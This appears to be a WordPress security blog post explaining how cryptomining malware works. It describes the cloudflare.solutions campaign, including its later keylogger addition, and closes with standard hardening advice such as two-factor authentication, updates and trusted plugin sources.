Cryptomining malware is a new form of malware that uses the resources of compromised servers and hosting accounts to generate cryptocurrencies like Bitcoin and Litecoin. Before a coin can be created, miners have to demonstrate “proof of work,” which involves computationally intensive mathematical operations. Legitimate miners buy powerful computers to do the hard work, but criminals use malware-infected machines.
Over the last few weeks the value of cryptocurrencies, particularly Bitcoin, has increased quickly. By using compromised machines to generate coins, criminals create a digital asset that can be converted into hard currency. Because the value of cryptocurrencies is rising, we can expect to see more frequent and sophisticated attacks through 2018.
Cryptocurrencies are based on blockchain technology. A blockchain is a distributed ledger, a data structure that records transactions and is shared, modified, and verified by many different network nodes. The ledger records transactions like transfers of coins between users, but also the creation of new coins. You can read more about how new coins are created here, but, in a nutshell, to create a coin a miner has to prove to the network that they have done an amount of work. Without the proof of work, it would be easy for anyone to make coins and individual coins wouldn’t be worth much.
In the early days of cryptocurrencies, creating coins was easy: they could be generated quickly on low-powered hardware. Over time, the amount of work needed increases, and today serious miners use clusters of machines with powerful GPUs. But the alternative to a few high-powered specialized machines is many low-powered machines like laptops and smartphones.
Cryptomining malware — code injected into websites via known vulnerabilities or installed along with pirate themes and plugins — allows its authors to run the proof-of-work calculations on large networks of compromised machines, generating coins with minimal investment.
One of the most popular pieces of cryptomining malware for WordPress sites is called Cloudflare.solutions, which has nothing to do with the real Cloudflare. Discovered earlier this year, cloudflare.solutions loads malicious cryptomining code. When a user opens a page on a compromised site, the malicious code runs and uses the device’s resources to perform mining operations. Hijacking the processor can degrade browser and device performance and diminish battery life.
In an unpleasant twist, cloudflare.solutions has recently been modified to include a keylogger that sends text entered into WordPress text entry fields, including password fields, to the criminals’ servers.
It should be mentioned that some “legitimate” publishers are taking advantage of cryptomining to generate revenue for their sites. I’ll avoid debating the ethics here, but it’s undeniable that a large number of cryptomining scripts found on the web are the result of exploited sites and are funneling money to criminal organizations.
The best way to avoid being infected by cryptomining malware is to follow standard WordPress security best practices: use two-factor authentication, update your WordPress site when new versions are released, and only install themes and plugins from trusted sources.